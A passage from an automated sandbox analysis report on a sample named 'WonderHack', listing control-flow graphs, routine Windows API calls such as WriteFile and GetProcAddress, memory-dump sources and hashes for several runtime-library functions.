                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: e9107ca6adb4b38642286b9ce8e1e87ed94561d6ea168791856c5832664b47f3
                                                                                                                                                                                                                                                                          • Instruction ID: a254adccbeae50df102a8fdeb025ab6bfaf106b1225afdd525d7b24770857724
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9107ca6adb4b38642286b9ce8e1e87ed94561d6ea168791856c5832664b47f3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D09231000109ABCF01AF60ED4DEAD3F6AEF41389B044024F91A5A1B1DF719D92FA90

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 223 cbad2d-cbad4f 224 cbaf42 223->224 225 cbad55-cbad57 223->225 228 cbaf44-cbaf48 224->228 226 cbad59-cbad78 call caf3f8 225->226 227 cbad83-cbada6 225->227 234 cbad7b-cbad7e 226->234 230 cbada8-cbadaa 227->230 231 cbadac-cbadb2 227->231 230->231 233 cbadb4-cbadc5 230->233 231->226 231->233 235 cbadd8-cbade8 call cbb05a 233->235 236 cbadc7-cbadd5 call cb9add 233->236 234->228 241 cbadea-cbadf0 235->241 242 cbae31-cbae43 235->242 236->235 245 cbae19-cbae2f call cbb0d7 241->245 246 cbadf2-cbadf5 241->246 243 cbae9a-cbaeba WriteFile 242->243 244 cbae45-cbae4b 242->244 249 cbaebc-cbaec2 GetLastError 243->249 250 cbaec5 243->250 252 cbae4d-cbae50 244->252 253 cbae86-cbae93 call cbb506 244->253 264 cbae12-cbae14 245->264 247 cbae00-cbae0f call cbb49e 246->247 248 cbadf7-cbadfa 246->248 247->264 248->247 254 cbaeda-cbaedd 248->254 249->250 258 cbaec8-cbaed3 250->258 259 cbae72-cbae84 call cbb6ca 252->259 260 cbae52-cbae55 252->260 263 cbae98 253->263 267 cbaee0-cbaee2 254->267 265 cbaf3d-cbaf40 258->265 266 cbaed5-cbaed8 258->266 270 cbae6d-cbae70 259->270 260->267 268 cbae5b-cbae68 call cbb5e1 260->268 263->270 264->258 265->228 266->254 271 cbaf10-cbaf1c 267->271 272 cbaee4-cbaee9 267->272 268->270 270->264 274 cbaf1e-cbaf24 271->274 275 cbaf26-cbaf38 271->275 276 cbaeeb-cbaefd 272->276 277 cbaf02-cbaf0b call caebf0 272->277 274->224 274->275 275->234 276->234 277->234
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CBB0D7: GetConsoleOutputCP.KERNEL32(0BDF5ED4,00000000,00000000,?), ref: 00CBB13A
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00CAA691,?,00CAA8F3), ref: 00CBAEB2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00CAA691,?,00CAA8F3,?,00CAA8F3,?,?,?,?,?,?,?,?,?,?), ref: 00CBAEBC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6f536668ab7e515bba6e41e8d367a554caee8a3362fde0cb2d3d0df1d890ed22
                                                                                                                                                                                                                                                                          • Instruction ID: ed2120fedaf663c26f1c6f1866f46ca3904faef9f8ce7bf5ab65d52cfe988d26
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f536668ab7e515bba6e41e8d367a554caee8a3362fde0cb2d3d0df1d890ed22
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E261B0B1D00159AFDF11CFA8C884EFEBBB9AF19304F140159E954A7252D372DE11DBA2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 280 cbb506-cbb55b call ca6c90 283 cbb55d 280->283 284 cbb5d0-cbb5e0 call ca2303 280->284 286 cbb563 283->286 288 cbb569-cbb56b 286->288 289 cbb56d-cbb572 288->289 290 cbb585-cbb5aa WriteFile 288->290 291 cbb57b-cbb583 289->291 292 cbb574-cbb57a 289->292 293 cbb5c8-cbb5ce GetLastError 290->293 294 cbb5ac-cbb5b7 290->294 291->288 291->290 292->291 293->284 294->284 295 cbb5b9-cbb5c4 294->295 295->286 296 cbb5c6 295->296 296->284
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00CBAE98,?,00CAA8F3,?,?,?,00000000), ref: 00CBB5A2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00CBAE98,?,00CAA8F3,?,?,?,00000000,?,?,?,?,?,00CAA691,?,00CAA8F3), ref: 00CBB5C8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                                                                                                                                          • Opcode ID: b99a32090b300fb5d9825fb9b3b3898ea79d30c6e50dbd928701ad632cccd945
                                                                                                                                                                                                                                                                          • Instruction ID: a78c4d5a8cdd8112473116a825e5e3007499efe7603f050be6d175753310a9ba
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b99a32090b300fb5d9825fb9b3b3898ea79d30c6e50dbd928701ad632cccd945
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C21B134A002199FCF25CF19DC80AEDB7B9EB59305F1441AAE906D7211D770EE46CF61

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 297 cb4c19-cb4c1e 298 cb4c20-cb4c38 297->298 299 cb4c3a-cb4c3e 298->299 300 cb4c46-cb4c4f 298->300 299->300 301 cb4c40-cb4c44 299->301 302 cb4c61 300->302 303 cb4c51-cb4c54 300->303 304 cb4cbb-cb4cbf 301->304 307 cb4c63-cb4c70 GetStdHandle 302->307 305 cb4c5d-cb4c5f 303->305 306 cb4c56-cb4c5b 303->306 304->298 308 cb4cc5-cb4cc8 304->308 305->307 306->307 309 cb4c9d-cb4caf 307->309 310 cb4c72-cb4c74 307->310 309->304 311 cb4cb1-cb4cb4 309->311 310->309 312 cb4c76-cb4c7f GetFileType 310->312 311->304 312->309 313 cb4c81-cb4c8a 312->313 314 cb4c8c-cb4c90 313->314 315 cb4c92-cb4c95 313->315 314->304 315->304 316 cb4c97-cb4c9b 315->316 316->304
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00CB4B08,00CCEBC0), ref: 00CB4C65
                                                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00CB4B08,00CCEBC0), ref: 00CB4C77
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                          • Opcode ID: 624b952bb542704ffc807e212c17d90654434450c6530992afa7b8e8b8ef9478
                                                                                                                                                                                                                                                                          • Instruction ID: b04ee44e7e7ef2b420b0e737404aff0064446cc82b1246cd7a8505694fc90fec
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 624b952bb542704ffc807e212c17d90654434450c6530992afa7b8e8b8ef9478
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B11E13120AB414AC7384E3E8DC86A6BE94A796730F38071AD4B7935F2C330DA82D240

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 00C91BC8
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 00C91BE8
                                                                                                                                                                                                                                                                            • Part of subcall function 00C91890: CreateFileA.KERNELBASE ref: 00C91913
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileModule$CreateHandleName
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2828212432-0
                                                                                                                                                                                                                                                                          • Opcode ID: c032e09deec81b1edd4441fe7f8fb8dc47210257966a06e463db8e0560c7c22f
                                                                                                                                                                                                                                                                          • Instruction ID: f77b3ace93617928ccc302e7a57bbd5ae18b2416198aa395c72e78a3637e9487
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c032e09deec81b1edd4441fe7f8fb8dc47210257966a06e463db8e0560c7c22f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF0BDB19042098FCB54EF78D94579DBBF4EB55300F4185BDD8C9D7280EA745A889F82

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 322 cb3187-cb3190 323 cb31bf-cb31c0 322->323 324 cb3192-cb31a5 RtlFreeHeap 322->324 324->323 325 cb31a7-cb31be GetLastError call caebad call caeb64 324->325 325->323
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00CB7421,?,00000000,?,?,00CB70C1,?,00000007,?,?,00CB7A07,?,?), ref: 00CB319D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00CB7421,?,00000000,?,?,00CB70C1,?,00000007,?,?,00CB7A07,?,?), ref: 00CB31A8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                          • Opcode ID: 05e86eda8f9ffec077e5bdc15647489f64d14fe0daab367c3d94db6c5879c79c
                                                                                                                                                                                                                                                                          • Instruction ID: 204e15eb50cf7a830a8973e678e2437e088d5a47b947f5e14a7920feb819f7db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e86eda8f9ffec077e5bdc15647489f64d14fe0daab367c3d94db6c5879c79c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE08C32100258ABCB112BA4EC0DFDD3B9DAB41795F044024FA0E9A0B0EA348A40DBD8

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 330 ca4cf2-ca4d17 331 ca4d19-ca4d1b 330->331 332 ca4d20-ca4d28 330->332 333 ca4e12-ca4e1f call ca2303 331->333 334 ca4d2a-ca4d34 332->334 335 ca4d50-ca4d54 332->335 334->335 337 ca4d36-ca4d4b 334->337 338 ca4d5a-ca4d69 call ca53c3 335->338 339 ca4e0c 335->339 341 ca4e11 337->341 344 ca4d6b-ca4d6f 338->344 345 ca4d71-ca4da6 338->345 339->341 341->333 346 ca4db9 call ca4915 344->346 351 ca4da8-ca4dab 345->351 352 ca4dd2-ca4dda 345->352 349 ca4dbe-ca4dd0 346->349 349->341 351->352 353 ca4dad-ca4db1 351->353 354 ca4def-ca4e0a 352->354 355 ca4ddc-ca4ded call cb088d 352->355 353->339 357 ca4db3-ca4db6 353->357 354->341 355->339 355->354 357->346
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2391cf4eddf196496c96a7a4b28d23858ac8ef9f6b27d035f2a4c56746a6104e
                                                                                                                                                                                                                                                                          • Instruction ID: 19cdbaac5a720ba3c6d3c25310e7a0ae521c3d17094242208348993cd50aabd8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2391cf4eddf196496c96a7a4b28d23858ac8ef9f6b27d035f2a4c56746a6104e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41A03190011BEBCF18DFA9C4909EEB7B9FF8A318B54006AE541E7650E770EA11DBA0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 359 ca3a58-ca3a72 360 ca3a7b-ca3a83 359->360 361 ca3a74-ca3a76 359->361 363 ca3aa4-ca3aa8 360->363 364 ca3a85-ca3a8f 360->364 362 ca3b54-ca3b61 call ca2303 361->362 366 ca3aae-ca3abf call ca42e8 363->366 367 ca3b50 363->367 364->363 369 ca3a91-ca3aa2 364->369 375 ca3ac1-ca3ac5 366->375 376 ca3ac7-ca3afb 366->376 371 ca3b53 367->371 373 ca3b1d-ca3b1f 369->373 371->362 373->371 377 ca3b0e call ca340f 375->377 382 ca3afd-ca3b00 376->382 383 ca3b21-ca3b29 376->383 380 ca3b13-ca3b1a 377->380 380->373 382->383 386 ca3b02-ca3b06 382->386 384 ca3b2b-ca3b3c call cb088d 383->384 385 ca3b3e-ca3b4e 383->385 384->367 384->385 385->371 386->367 388 ca3b08-ca3b0b 386->388 388->377
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 48dea4a6ececec08fc81539f57706c6aecde4fc5b19f5d6e4e44308bce75dc28
                                                                                                                                                                                                                                                                          • Instruction ID: ced30d8fd00e56c37bb820db7f0e85976fa4613b1a4f30e0ae68d2888b3dad77
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48dea4a6ececec08fc81539f57706c6aecde4fc5b19f5d6e4e44308bce75dc28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831863290015BAFCF14CEA8D8909EDB7B9BF0A324B140265F552E7290D721EA44DBA0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CA2B03: GetModuleHandleExW.KERNEL32(00000002,00000000,00C9E5B1,?,?,00CA2AC6,?,?,00CA2A97,?,?,?,00C9E5B1), ref: 00CA2B0F
                                                                                                                                                                                                                                                                          • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,0BDF5ED4,?,?,?,00CC3374,000000FF), ref: 00CA2BF9
                                                                                                                                                                                                                                                                            • Part of subcall function 00C9B920: std::_Throw_Cpp_error.LIBCPMT ref: 00C9B94C
                                                                                                                                                                                                                                                                            • Part of subcall function 00C9B920: std::_Throw_Cpp_error.LIBCPMT ref: 00C9B968
                                                                                                                                                                                                                                                                            • Part of subcall function 00CA5C60: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00C9B9E9,?,00C9FD92), ref: 00CA5C75
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1423221283-0
                                                                                                                                                                                                                                                                          • Opcode ID: 65d7f065ddc5d293d44d56bb16298e7214f18f89eb19d6eafe4dd0948ab615a2
                                                                                                                                                                                                                                                                          • Instruction ID: 8bd04937281f40e050dfb7b569715d37a2ad7e11b7e0b654c542c1b5944d25f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d7f065ddc5d293d44d56bb16298e7214f18f89eb19d6eafe4dd0948ab615a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32110832604A266BCF256F19FD05B6EB764EB42B34F18441BF812976E1CF34DD01D654

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 420 cb41c4-cb41ee 421 cb41f0-cb41f2 420->421 422 cb41f4-cb41f6 420->422 423 cb4245-cb4248 421->423 424 cb41f8-cb41fa 422->424 425 cb41fc-cb4203 call cb40f9 422->425 424->423 427 cb4208-cb420c 425->427 428 cb422b-cb4242 427->428 429 cb420e-cb421c GetProcAddress 427->429 430 cb4244 428->430 429->428 431 cb421e-cb4229 call ca9e6f 429->431 430->423 431->430
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
